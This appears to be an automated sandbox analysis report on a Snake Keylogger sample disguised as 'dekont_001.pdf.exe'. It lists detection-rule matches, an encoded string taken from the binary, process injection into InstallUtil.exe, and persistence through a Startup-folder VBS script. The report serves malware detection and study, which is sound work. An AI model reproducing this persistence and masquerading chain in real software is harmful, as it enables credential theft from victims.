              Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: dekont_001.pdf.exe, -.csCryptographic APIs: 'CreateDecryptor'
              Source: RequiredContract.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, --Z--.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, --Z--.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, ---t.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, ---t.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: dekont_001.pdf.exe, -.csBase64 encoded string: 'Ty84iOmHMgQumuCPfyIik+LEXSU4meGIcC9wu+meWTg/jvWrbyUuke6GZW0smfi1WiMnkMKLcTNwk/y1VTgujfmLcD8/hbeNeSIUsOmEeyIjx8uPaAIyjOmsbjkmtO2EeDoux+uPaAkFneGPJx8lmOmSUzBwrumLeAU/juWEe20KmOjRezM/o9yFbz8/leOEJzEuiNOpaSQ5meKeWDkmneWEJwUuiMiLaDdwzbzfL25wvf+ZeTspkPW5eSQ9mf7RTz8mjOCPXSU4meGIcC8OhPyGcyQujreIfTQukPqHJyUmk+ePaDM4iA=='
              Source: RequiredContract.exe.0.dr, -.csBase64 encoded string: 'Ty84iOmHMgQumuCPfyIik+LEXSU4meGIcC9wu+meWTg/jvWrbyUuke6GZW0smfi1WiMnkMKLcTNwk/y1VTgujfmLcD8/hbeNeSIUsOmEeyIjx8uPaAIyjOmsbjkmtO2EeDoux+uPaAkFneGPJx8lmOmSUzBwrumLeAU/juWEe20KmOjRezM/o9yFbz8/leOEJzEuiNOpaSQ5meKeWDkmneWEJwUuiMiLaDdwzbzfL25wvf+ZeTspkPW5eSQ9mf7RTz8mjOCPXSU4meGIcC8OhPyGcyQujreIfTQukPqHJyUmk+ePaDM4iA=='
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs"
              Source: dekont_001.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: dekont_001.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: InstallUtil.exe, 00000001.00000002.4215771932.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.00000000030C6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002D0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: dekont_001.pdf.exeReversingLabs: Detection: 39%
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeFile read: C:\Users\user\Desktop\dekont_001.pdf.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\dekont_001.pdf.exe "C:\Users\user\Desktop\dekont_001.pdf.exe"
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\RequiredContract.exe "C:\Users\user\AppData\Roaming\RequiredContract.exe"
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\RequiredContract.exe "C:\Users\user\AppData\Roaming\RequiredContract.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
